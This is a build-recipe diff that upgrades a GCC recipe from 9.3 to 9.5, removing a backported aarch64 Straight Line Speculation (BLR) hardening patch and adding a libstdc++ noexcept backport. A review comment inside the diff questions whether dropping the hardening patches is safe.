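-Subject: [PATCH 3/3] aarch64: Mitigate SLS for BLR instruction
-
-This patch introduces the mitigation for Straight Line Speculation past
-the BLR instruction.
-
-This mitigation replaces BLR instructions with a BL to a stub which uses
-a BR to jump to the original value. These function stubs are then
-appended with a speculation barrier to ensure no straight line
-speculation happens after these jumps.
-
-When optimising for speed we use a set of stubs for each function since
-this should help the branch predictor make more accurate predictions
-about where a stub should branch.
-
-When optimising for size we use one set of stubs for all functions.
-This set of stubs can have human readable names, and we are using
-`__call_indirect_x<N>` for register x<N>.
-
-When BTI branch protection is enabled the BLR instruction can jump to a
-`BTI c` instruction using any register, while the BR instruction can
-only jump to a `BTI c` instruction using the x16 or x17 registers.
-Hence, in order to ensure this transformation is safe we mov the value
-of the original register into x16 and use x16 for the BR.
-
-As an example when optimising for size:
-a
- BLR x0
-instruction would get transformed to something like
- BL __call_indirect_x0
-where __call_indirect_x0 labels a thunk that contains
-__call_indirect_x0:
- MOV X16, X0
- BR X16
- <speculation barrier>
-
-The first version of this patch used local symbols specific to a
-compilation unit to try and avoid relocations.
-This was mistaken since functions coming from the same compilation unit
-can still be in different sections, and the assembler will insert
-relocations at jumps between sections.
-
-On any relocation the linker is permitted to emit a veneer to handle
-jumps between symbols that are very far apart. The registers x16 and
-x17 may be clobbered by these veneers.
-Hence the function stubs cannot rely on the values of x16 and x17 being
-the same as just before the function stub is called.
-
-Similar can be said for the hot/cold partitioning of single functions,
-so function-local stubs have the same restriction.
-
-This updated version of the patch never emits function stubs for x16 and
-x17, and instead forces other registers to be used.
-
-Given the above, there is now no benefit to local symbols (since they
-are not enough to avoid dealing with linker intricacies). This patch
-now uses global symbols with hidden visibility each stored in their own
-COMDAT section. This means stubs can be shared between compilation
-units while still avoiding the PLT indirection.
-
-This patch also removes the `__call_indirect_x30` stub (and
-function-local equivalent) which would simply jump back to the original
-location.
-
-The function-local stubs are emitted to the assembly output file in one
-chunk, which means we need not add the speculation barrier directly
-after each one.
-This is because we know for certain that the instructions directly after
-the BR in all but the last function stub will be from another one of
-these stubs and hence will not contain a speculation gadget.
-Instead we add a speculation barrier at the end of the sequence of
-stubs.
-
-The global stubs are emitted in COMDAT/.linkonce sections by
-themselves so that the linker can remove duplicates from multiple object
-files. This means they are not emitted in one chunk, and each one must
-include the speculation barrier.
-
-Another difference is that since the global stubs are shared across
-compilation units we do not know that all functions will be targeting an
-architecture supporting the SB instruction.
-Rather than provide multiple stubs for each architecture, we provide a
-stub that will work for all architectures -- using the DSB+ISB barrier.
-
-This mitigation does not apply for BLR instructions in the following
-places:
-- Some accesses to thread-local variables use a code sequence with a BLR
- instruction. This code sequence is part of the binary interface between
- compiler and linker. If this BLR instruction needs to be mitigated, it'd
- probably be best to do so in the linker. It seems that the code sequence
- for thread-local variable access is unlikely to lead to a Spectre Revalation
- Gadget.
-- PLT stubs are produced by the linker and each contain a BLR instruction.
- It seems that at most only after the last PLT stub a Spectre Revalation
- Gadget might appear.
-
-Testing:
- Bootstrap and regtest on AArch64
- (with BOOT_CFLAGS="-mharden-sls=retbr,blr")
- Used a temporary hack(1) in gcc-dg.exp to use these options on every
- test in the testsuite, a slight modification to emit the speculation
- barrier after every function stub, and a script to check that the
- output never emitted a BLR, or unmitigated BR or RET instruction.
- Similar on an aarch64-none-elf cross-compiler.
-
-1) Temporary hack emitted a speculation barrier at the end of every stub
-function, and used a script to ensure that:
- a) Every RET or BR is immediately followed by a speculation barrier.
- b) No BLR instruction is emitted by compiler.
-
-(cherry picked from 96b7f495f9269d5448822e4fc28882edb35a58d7)
-
-gcc/ChangeLog:
-
- * config/aarch64/aarch64-protos.h (aarch64_indirect_call_asm):
- New declaration.
- * config/aarch64/aarch64.c (aarch64_regno_regclass): Handle new
- stub registers class.
- (aarch64_class_max_nregs): Likewise.
- (aarch64_register_move_cost): Likewise.
- (aarch64_sls_shared_thunks): Global array to store stub labels.
- (aarch64_sls_emit_function_stub): New.
- (aarch64_create_blr_label): New.
- (aarch64_sls_emit_blr_function_thunks): New.
- (aarch64_sls_emit_shared_blr_thunks): New.
- (aarch64_asm_file_end): New.
- (aarch64_indirect_call_asm): New.
- (TARGET_ASM_FILE_END): Use aarch64_asm_file_end.
- (TARGET_ASM_FUNCTION_EPILOGUE): Use
- aarch64_sls_emit_blr_function_thunks.
- * config/aarch64/aarch64.h (STB_REGNUM_P): New.
- (enum reg_class): Add STUB_REGS class.
- (machine_function): Introduce `call_via` array for
- function-local stub labels.
- * config/aarch64/aarch64.md (*call_insn, *call_value_insn): Use
- aarch64_indirect_call_asm to emit code when hardening BLR
- instructions.
- * config/aarch64/constraints.md (Ucr): New constraint
- representing registers for indirect calls. Is GENERAL_REGS
- usually, and STUB_REGS when hardening BLR instruction against
- SLS.
- * config/aarch64/predicates.md (aarch64_general_reg): STUB_REGS class
- is also a general register.
-
-gcc/testsuite/ChangeLog:
-
- * gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c: New test.
- * gcc.target/aarch64/sls-mitigation/sls-miti-blr.c: New test.
----
- gcc/config/aarch64/aarch64-protos.h | 1 +
- gcc/config/aarch64/aarch64.c | 225 +++++++++++++++++-
- gcc/config/aarch64/aarch64.h | 15 ++
- gcc/config/aarch64/aarch64.md | 11 +-
- gcc/config/aarch64/constraints.md | 9 +
- gcc/config/aarch64/predicates.md | 3 +-
- .../aarch64/sls-mitigation/sls-miti-blr-bti.c | 40 ++++
- .../aarch64/sls-mitigation/sls-miti-blr.c | 33 +++
- 8 files changed, 328 insertions(+), 9 deletions(-)
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index 885eae893..2676e43ae 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -645,6 +645,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
- const char *aarch64_sls_barrier (int);
-+const char *aarch64_indirect_call_asm (rtx);
- extern bool aarch64_harden_sls_retbr_p (void);
- extern bool aarch64_harden_sls_blr_p (void);
-
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index dff61105c..bc6c02c3a 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -8190,6 +8190,9 @@ aarch64_label_mentioned_p (rtx x)
- enum reg_class
- aarch64_regno_regclass (unsigned regno)
- {
-+ if (STUB_REGNUM_P (regno))
-+ return STUB_REGS;
-+
- if (GP_REGNUM_P (regno))
- return GENERAL_REGS;
-
-@@ -8499,6 +8502,7 @@ aarch64_class_max_nregs (reg_class_t regclass, machine_mode mode)
- unsigned int nregs;
- switch (regclass)
- {
-+ case STUB_REGS:
- case TAILCALL_ADDR_REGS:
- case POINTER_REGS:
- case GENERAL_REGS:
-@@ -10693,10 +10697,12 @@ aarch64_register_move_cost (machine_mode mode,
- = aarch64_tune_params.regmove_cost;
-
- /* Caller save and pointer regs are equivalent to GENERAL_REGS. */
-- if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS)
-+ if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS
-+ || to == STUB_REGS)
- to = GENERAL_REGS;
-
-- if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS)
-+ if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS
-+ || from == STUB_REGS)
- from = GENERAL_REGS;
-
- /* Moving between GPR and stack cost is the same as GP2GP. */
-@@ -19009,6 +19015,215 @@ aarch64_sls_barrier (int mitigation_required)
- : "";
- }
-
-+static GTY (()) tree aarch64_sls_shared_thunks[30];
-+static GTY (()) bool aarch64_sls_shared_thunks_needed = false;
-+const char *indirect_symbol_names[30] = {
-+ "__call_indirect_x0",
-+ "__call_indirect_x1",
-+ "__call_indirect_x2",
-+ "__call_indirect_x3",
-+ "__call_indirect_x4",
-+ "__call_indirect_x5",
-+ "__call_indirect_x6",
-+ "__call_indirect_x7",
-+ "__call_indirect_x8",
-+ "__call_indirect_x9",
-+ "__call_indirect_x10",
-+ "__call_indirect_x11",
-+ "__call_indirect_x12",
-+ "__call_indirect_x13",
-+ "__call_indirect_x14",
-+ "__call_indirect_x15",
-+ "", /* "__call_indirect_x16", */
-+ "", /* "__call_indirect_x17", */
-+ "__call_indirect_x18",
-+ "__call_indirect_x19",
-+ "__call_indirect_x20",
-+ "__call_indirect_x21",
-+ "__call_indirect_x22",
-+ "__call_indirect_x23",
-+ "__call_indirect_x24",
-+ "__call_indirect_x25",
-+ "__call_indirect_x26",
-+ "__call_indirect_x27",
-+ "__call_indirect_x28",
-+ "__call_indirect_x29",
-+};
-+
-+/* Function to create a BLR thunk. This thunk is used to mitigate straight
-+ line speculation. Instead of a simple BLR that can be speculated past,
-+ we emit a BL to this thunk, and this thunk contains a BR to the relevant
-+ register. These thunks have the relevant speculation barries put after
-+ their indirect branch so that speculation is blocked.
-+
-+ We use such a thunk so the speculation barriers are kept off the
-+ architecturally executed path in order to reduce the performance overhead.
-+
-+ When optimizing for size we use stubs shared by the linked object.
-+ When optimizing for performance we emit stubs for each function in the hope
-+ that the branch predictor can better train on jumps specific for a given
-+ function. */
-+rtx
-+aarch64_sls_create_blr_label (int regnum)
-+{
-+ gcc_assert (STUB_REGNUM_P (regnum));
-+ if (optimize_function_for_size_p (cfun))
-+ {
-+ /* For the thunks shared between different functions in this compilation
-+ unit we use a named symbol -- this is just for users to more easily
-+ understand the generated assembly. */
-+ aarch64_sls_shared_thunks_needed = true;
-+ const char *thunk_name = indirect_symbol_names[regnum];
-+ if (aarch64_sls_shared_thunks[regnum] == NULL)
-+ {
-+ /* Build a decl representing this function stub and record it for
-+ later. We build a decl here so we can use the GCC machinery for
-+ handling sections automatically (through `get_named_section` and
-+ `make_decl_one_only`). That saves us a lot of trouble handling
-+ the specifics of different output file formats. */
-+ tree decl = build_decl (BUILTINS_LOCATION, FUNCTION_DECL,
-+ get_identifier (thunk_name),
-+ build_function_type_list (void_type_node,
-+ NULL_TREE));
-+ DECL_RESULT (decl) = build_decl (BUILTINS_LOCATION, RESULT_DECL,
-+ NULL_TREE, void_type_node);
-+ TREE_PUBLIC (decl) = 1;
-+ TREE_STATIC (decl) = 1;
-+ DECL_IGNORED_P (decl) = 1;
-+ DECL_ARTIFICIAL (decl) = 1;
-+ make_decl_one_only (decl, DECL_ASSEMBLER_NAME (decl));
-+ resolve_unique_section (decl, 0, false);
-+ aarch64_sls_shared_thunks[regnum] = decl;
-+ }
-+
-+ return gen_rtx_SYMBOL_REF (Pmode, thunk_name);
-+ }
-+
-+ if (cfun->machine->call_via[regnum] == NULL)
-+ cfun->machine->call_via[regnum]
-+ = gen_rtx_LABEL_REF (Pmode, gen_label_rtx ());
-+ return cfun->machine->call_via[regnum];
-+}
-+
-+/* Helper function for aarch64_sls_emit_blr_function_thunks and
-+ aarch64_sls_emit_shared_blr_thunks below. */
-+static void
-+aarch64_sls_emit_function_stub (FILE *out_file, int regnum)
-+{
-+ /* Save in x16 and branch to that function so this transformation does
-+ not prevent jumping to `BTI c` instructions. */
-+ asm_fprintf (out_file, "\tmov\tx16, x%d\n", regnum);
-+ asm_fprintf (out_file, "\tbr\tx16\n");
-+}
-+
-+/* Emit all BLR stubs for this particular function.
-+ Here we emit all the BLR stubs needed for the current function. Since we
-+ emit these stubs in a consecutive block we know there will be no speculation
-+ gadgets between each stub, and hence we only emit a speculation barrier at
-+ the end of the stub sequences.
-+
-+ This is called in the TARGET_ASM_FUNCTION_EPILOGUE hook. */
-+void
-+aarch64_sls_emit_blr_function_thunks (FILE *out_file)
-+{
-+ if (! aarch64_harden_sls_blr_p ())
-+ return;
-+
-+ bool any_functions_emitted = false;
-+ /* We must save and restore the current function section since this assembly
-+ is emitted at the end of the function. This means it can be emitted *just
-+ after* the cold section of a function. That cold part would be emitted in
-+ a different section. That switch would trigger a `.cfi_endproc` directive
-+ to be emitted in the original section and a `.cfi_startproc` directive to
-+ be emitted in the new section. Switching to the original section without
-+ restoring would mean that the `.cfi_endproc` emitted as a function ends
-+ would happen in a different section -- leaving an unmatched
-+ `.cfi_startproc` in the cold text section and an unmatched `.cfi_endproc`
-+ in the standard text section. */
-+ section *save_text_section = in_section;
-+ switch_to_section (function_section (current_function_decl));
-+ for (int regnum = 0; regnum < 30; ++regnum)
-+ {
-+ rtx specu_label = cfun->machine->call_via[regnum];
-+ if (specu_label == NULL)
-+ continue;
-+
-+ targetm.asm_out.print_operand (out_file, specu_label, 0);
-+ asm_fprintf (out_file, ":\n");
-+ aarch64_sls_emit_function_stub (out_file, regnum);
-+ any_functions_emitted = true;
-+ }
-+ if (any_functions_emitted)
-+ /* Can use the SB if needs be here, since this stub will only be used
-+ by the current function, and hence for the current target. */
-+ asm_fprintf (out_file, "\t%s\n", aarch64_sls_barrier (true));
-+ switch_to_section (save_text_section);
-+}
-+
-+/* Emit shared BLR stubs for the current compilation unit.
-+ Over the course of compiling this unit we may have converted some BLR
-+ instructions to a BL to a shared stub function. This is where we emit those
-+ stub functions.
-+ This function is for the stubs shared between different functions in this
-+ compilation unit. We share when optimizing for size instead of speed.
-+
-+ This function is called through the TARGET_ASM_FILE_END hook. */
-+void
-+aarch64_sls_emit_shared_blr_thunks (FILE *out_file)
-+{
-+ if (! aarch64_sls_shared_thunks_needed)
-+ return;
-+
-+ for (int regnum = 0; regnum < 30; ++regnum)
-+ {
-+ tree decl = aarch64_sls_shared_thunks[regnum];
-+ if (!decl)
-+ continue;
-+
-+ const char *name = indirect_symbol_names[regnum];
-+ switch_to_section (get_named_section (decl, NULL, 0));
-+ ASM_OUTPUT_ALIGN (out_file, 2);
-+ targetm.asm_out.globalize_label (out_file, name);
-+ /* Only emits if the compiler is configured for an assembler that can
-+ handle visibility directives. */
-+ targetm.asm_out.assemble_visibility (decl, VISIBILITY_HIDDEN);
-+ ASM_OUTPUT_TYPE_DIRECTIVE (out_file, name, "function");
-+ ASM_OUTPUT_LABEL (out_file, name);
-+ aarch64_sls_emit_function_stub (out_file, regnum);
-+ /* Use the most conservative target to ensure it can always be used by any
-+ function in the translation unit. */
-+ asm_fprintf (out_file, "\tdsb\tsy\n\tisb\n");
-+ ASM_DECLARE_FUNCTION_SIZE (out_file, name, decl);
-+ }
-+}
-+
-+/* Implement TARGET_ASM_FILE_END. */
-+void
-+aarch64_asm_file_end ()
-+{
-+ aarch64_sls_emit_shared_blr_thunks (asm_out_file);
-+ /* Since this function will be called for the ASM_FILE_END hook, we ensure
-+ that what would be called otherwise (e.g. `file_end_indicate_exec_stack`
-+ for FreeBSD) still gets called. */
-+#ifdef TARGET_ASM_FILE_END
-+ TARGET_ASM_FILE_END ();
-+#endif
-+}
-+
-+const char *
-+aarch64_indirect_call_asm (rtx addr)
-+{
-+ gcc_assert (REG_P (addr));
-+ if (aarch64_harden_sls_blr_p ())
-+ {
-+ rtx stub_label = aarch64_sls_create_blr_label (REGNO (addr));
-+ output_asm_insn ("bl\t%0", &stub_label);
-+ }
-+ else
-+ output_asm_insn ("blr\t%0", &addr);
-+ return "";
-+}
-+
- /* Target-specific selftests. */
-
- #if CHECKING_P
-@@ -19529,6 +19744,12 @@ aarch64_libgcc_floating_mode_supported_p
- #define TARGET_RUN_TARGET_SELFTESTS selftest::aarch64_run_selftests
- #endif /* #if CHECKING_P */
-
-+#undef TARGET_ASM_FILE_END
-+#define TARGET_ASM_FILE_END aarch64_asm_file_end
-+
-+#undef TARGET_ASM_FUNCTION_EPILOGUE
-+#define TARGET_ASM_FUNCTION_EPILOGUE aarch64_sls_emit_blr_function_thunks
-+
- struct gcc_target targetm = TARGET_INITIALIZER;
-
- #include "gt-aarch64.h"
-diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
-index 72ddc6fd9..60682a100 100644
---- a/gcc/config/aarch64/aarch64.h
-+++ b/gcc/config/aarch64/aarch64.h
-@@ -540,6 +540,16 @@ extern unsigned aarch64_architecture_version;
- #define GP_REGNUM_P(REGNO) \
- (((unsigned) (REGNO - R0_REGNUM)) <= (R30_REGNUM - R0_REGNUM))
-
-+/* Registers known to be preserved over a BL instruction. This consists of the
-+ GENERAL_REGS without x16, x17, and x30. The x30 register is changed by the
-+ BL instruction itself, while the x16 and x17 registers may be used by
-+ veneers which can be inserted by the linker. */
-+#define STUB_REGNUM_P(REGNO) \
-+ (GP_REGNUM_P (REGNO) \
-+ && (REGNO) != R16_REGNUM \
-+ && (REGNO) != R17_REGNUM \
-+ && (REGNO) != R30_REGNUM) \
-+
- #define FP_REGNUM_P(REGNO) \
- (((unsigned) (REGNO - V0_REGNUM)) <= (V31_REGNUM - V0_REGNUM))
-
-@@ -561,6 +571,7 @@ enum reg_class
- {
- NO_REGS,
- TAILCALL_ADDR_REGS,
-+ STUB_REGS,
- GENERAL_REGS,
- STACK_REG,
- POINTER_REGS,
-@@ -580,6 +591,7 @@ enum reg_class
- { \
- "NO_REGS", \
- "TAILCALL_ADDR_REGS", \
-+ "STUB_REGS", \
- "GENERAL_REGS", \
- "STACK_REG", \
- "POINTER_REGS", \
-@@ -596,6 +608,7 @@ enum reg_class
- { \
- { 0x00000000, 0x00000000, 0x00000000 }, /* NO_REGS */ \
- { 0x00030000, 0x00000000, 0x00000000 }, /* TAILCALL_ADDR_REGS */\
-+ { 0x3ffcffff, 0x00000000, 0x00000000 }, /* STUB_REGS */ \
- { 0x7fffffff, 0x00000000, 0x00000003 }, /* GENERAL_REGS */ \
- { 0x80000000, 0x00000000, 0x00000000 }, /* STACK_REG */ \
- { 0xffffffff, 0x00000000, 0x00000003 }, /* POINTER_REGS */ \
-@@ -735,6 +748,8 @@ typedef struct GTY (()) machine_function
- struct aarch64_frame frame;
- /* One entry for each hard register. */
- bool reg_is_wrapped_separately[LAST_SAVED_REGNUM];
-+ /* One entry for each general purpose register. */
-+ rtx call_via[SP_REGNUM];
- bool label_is_assembled;
- } machine_function;
- #endif
-diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
-index 494aee964..ed8cf8ece 100644
---- a/gcc/config/aarch64/aarch64.md
-+++ b/gcc/config/aarch64/aarch64.md
-@@ -908,15 +908,14 @@
- )
-
- (define_insn "*call_insn"
-- [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "r, Usf"))
-+ [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "Ucr, Usf"))
- (match_operand 1 "" ""))
- (clobber (reg:DI LR_REGNUM))]
- ""
- "@
-- blr\\t%0
-+ * return aarch64_indirect_call_asm (operands[0]);
- bl\\t%c0"
-- [(set_attr "type" "call, call")]
--)
-+ [(set_attr "type" "call, call")])
-
- (define_expand "call_value"
- [(parallel [(set (match_operand 0 "" "")
-@@ -934,12 +933,12 @@
-
- (define_insn "*call_value_insn"
- [(set (match_operand 0 "" "")
-- (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "r, Usf"))
-+ (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "Ucr, Usf"))
- (match_operand 2 "" "")))
- (clobber (reg:DI LR_REGNUM))]
- ""
- "@
-- blr\\t%1
-+ * return aarch64_indirect_call_asm (operands[1]);
- bl\\t%c1"
- [(set_attr "type" "call, call")]
- )
-diff --git a/gcc/config/aarch64/constraints.md b/gcc/config/aarch64/constraints.md
-index 21f9549e6..7756dbe83 100644
---- a/gcc/config/aarch64/constraints.md
-+++ b/gcc/config/aarch64/constraints.md
-@@ -24,6 +24,15 @@
- (define_register_constraint "Ucs" "TAILCALL_ADDR_REGS"
- "@internal Registers suitable for an indirect tail call")
-
-+(define_register_constraint "Ucr"
-+ "aarch64_harden_sls_blr_p () ? STUB_REGS : GENERAL_REGS"
-+ "@internal Registers to be used for an indirect call.
-+ This is usually the general registers, but when we are hardening against
-+ Straight Line Speculation we disallow x16, x17, and x30 so we can use
-+ indirection stubs. These indirection stubs cannot use the above registers
-+ since they will be reached by a BL that may have to go through a linker
-+ veneer.")
-+
- (define_register_constraint "w" "FP_REGS"
- "Floating point and SIMD vector registers.")
-
-diff --git a/gcc/config/aarch64/predicates.md b/gcc/config/aarch64/predicates.md
-index 8e1b78421..4250aecb3 100644
---- a/gcc/config/aarch64/predicates.md
-+++ b/gcc/config/aarch64/predicates.md
-@@ -32,7 +32,8 @@
-
- (define_predicate "aarch64_general_reg"
- (and (match_operand 0 "register_operand")
-- (match_test "REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
-+ (match_test "REGNO_REG_CLASS (REGNO (op)) == STUB_REGS
-+ || REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
-
- ;; Return true if OP a (const_int 0) operand.
- (define_predicate "const0_operand"
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-new file mode 100644
-index 000000000..b1fb754c7
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-@@ -0,0 +1,40 @@
-+/* { dg-do compile } */
-+/* { dg-additional-options "-mharden-sls=blr -mbranch-protection=bti" } */
-+/*
-+ Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+ Here we also check that there are no BR instructions with anything except an
-+ x16 or x17 register. This is because a `BTI c` instruction can be branched
-+ to using a BLR instruction using any register, but can only be branched to
-+ with a BR using an x16 or x17 register.
-+ */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+ does not. */
-+int blr_call_value (struct sls_testclass x)
-+{
-+ int retval = x.x(x.left, x.right);
-+ if (retval % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+ if (x.left % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler-not {\tbr\tx(?!16|17)} } } */
-+/* { dg-final { scan-assembler {\tbr\tx(16|17)} } } */
-+
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-new file mode 100644
-index 000000000..88baffffe
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-@@ -0,0 +1,33 @@
-+/* { dg-additional-options "-mharden-sls=blr -save-temps" } */
-+/* Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+ We only test that all BLR instructions have been removed, not that the
-+ resulting code makes sense. */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+ does not. */
-+int blr_call_value (struct sls_testclass x)
-+{
-+ int retval = x.x(x.left, x.right);
-+ if (retval % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+ if (x.left % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler {\tbr\tx[0-9][0-9]?} } } */
---
-2.25.1
-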
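--- a/meta/recipes-devtools/gcc/gcc-9.3.inc
+++ b/meta/recipes-devtools/gcc/gcc-9.5.inc
@@ -2,13 +2,13 @@ require gcc-common.inc
 
 # Third digit in PV should be incremented after a minor release
 
-PV = "9.3.0"
+PV = "9.5.0"
 
 # BINV should be incremented to a revision after a minor gcc release
 
-BINV = "9.3.0"
+BINV = "9.5.0"
 
-FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.3:${FILE_DIRNAME}/gcc-9.3/backport:"
+FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.5:${FILE_DIRNAME}/gcc-9.5/backport:"
 
 DEPENDS =+ "mpfr gmp libmpc zlib flex-native"
 NATIVEDEPS = "mpfr-native gmp-native libmpc-native zlib-native flex-native"
@@ -69,16 +69,14 @@ SRC_URI = "\
  file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \
  file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \
  file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \
- file://0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch \
- file://0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch \
- file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \
- file://0001-Backport-fix-for-PR-tree-optimization-97236-fix-bad-.patch \
+ file://0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch \
+ file://CVE-2023-4039.patch \
 "
 S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
-SRC_URI[sha256sum] = "71e197867611f6054aa1119b13a0c0abac12834765fe2d81f35ac57f84f742d1"
+SRC_URI[sha256sum] = "27769f64ef1d4cd5e2be8682c0c93f9887983e6cfd1a927ce5a0a2915a95cf8f"
 # For dev release snapshotting
 #S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/official-gcc-${RELEASE}"
-#B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
 
 # Language Overrides
 FORTRAN = ""
@@ -123,3 +121,6 @@ EXTRA_OECONF_PATHS = "\
  --with-sysroot=/not/exist \
  --with-build-sysroot=${STAGING_DIR_TARGET} \
 "
+
+# Is a binutils 2.26 issue, not gcc
+CVE_CHECK_WHITELIST += "CVE-2021-37322"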
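Review bot: The SRC_URI hunk drops the three aarch64 Straight-Line-Speculation patches (`0001-aarch64-New-…`, `0002-aarch64-Introduce-…`, `0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch`) and the PR 97236 backport without stating that 9.5.0 already carries them. Presumably they were merged on the upstream release branch, but nothing on this page shows that, and losing `-mharden-sls` support would be a hardening regression for aarch64 builds that pass it. I would confirm this against the 9.5.0 sources and record it in the commit message, e.g. `Dropped SLS and PR97236 backports: included in 9.5.0`. Separately, `B = …` under `# For dev release snapshotting` is uncommented in the same hunk; if that is not intended, keep it as `#B = …`.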
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
index 0d9222df17..0d9222df17 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
index f427ee67c1..f427ee67c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
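--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
@@ -0,0 +1,44 @@
+From 60d966708d7cf105dccf128d2b7a38b0b2580a1a Mon Sep 17 00:00:00 2001
+From: Jonathan Wakely <jwakely@redhat.com>
+Date: Fri, 5 Nov 2021 21:42:20 +0000
+Subject: [PATCH] libstdc++: Fix inconsistent noexcept-specific for valarray
+ begin/end
+
+These declarations should be noexcept after I added it to the
+definitions in <valarray>.
+
+libstdc++-v3/ChangeLog:
+
+ * include/bits/range_access.h (begin(valarray), end(valarray)):
+ Add noexcept.
+
+(cherry picked from commit 2b2d97fc545635a0f6aa9c9ee3b017394bc494bf)
+
+Upstream-Status: Backport [https://github.com/hkaelber/gcc/commit/2b2d97fc545635a0f6aa9c9ee3b017394bc494bf]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ libstdc++-v3/include/bits/range_access.h | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libstdc++-v3/include/bits/range_access.h b/libstdc++-v3/include/bits/range_access.h
+index 3d99ea92027..4736e75fda1 100644
+--- a/libstdc++-v3/include/bits/range_access.h
++++ b/libstdc++-v3/include/bits/range_access.h
+@@ -101,10 +101,10 @@ _GLIBCXX_BEGIN_NAMESPACE_VERSION
+
+ template<typename _Tp> class valarray;
+ // These overloads must be declared for cbegin and cend to use them.
+- template<typename _Tp> _Tp* begin(valarray<_Tp>&);
+- template<typename _Tp> const _Tp* begin(const valarray<_Tp>&);
+- template<typename _Tp> _Tp* end(valarray<_Tp>&);
+- template<typename _Tp> const _Tp* end(const valarray<_Tp>&);
++ template<typename _Tp> _Tp* begin(valarray<_Tp>&) noexcept;
++ template<typename _Tp> const _Tp* begin(const valarray<_Tp>&) noexcept;
++ template<typename _Tp> _Tp* end(valarray<_Tp>&) noexcept;
++ template<typename _Tp> const _Tp* end(const valarray<_Tp>&) noexcept;
+
+ /**
+ * @brief Return an iterator pointing to the first element of
+--
+2.25.1
\ No newline at end of file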
